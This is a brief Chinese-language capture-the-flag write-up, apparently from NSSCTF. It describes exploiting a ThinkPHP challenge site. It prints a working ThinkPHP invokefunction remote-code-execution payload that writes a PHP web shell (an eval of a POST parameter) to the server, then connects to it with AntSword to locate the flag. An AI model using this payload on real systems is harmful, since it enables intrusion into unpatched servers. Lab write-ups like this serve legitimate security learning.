页面什么都没有，扫目录，/robots.txt,进入/NSS/index.php，看见是thinkphp，不会，看wp，借助payload-dumper-解包工具，得到payload，

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=aaa.php&vars[1][]=<?php eval($_POST['cmd']);?>

在当前目录下生成aaa.php

蚁剑链接，flag里面是flag flag，回来看见nss，进去是ctf ctf，最后在/nss/ctf/flag/flag找到flag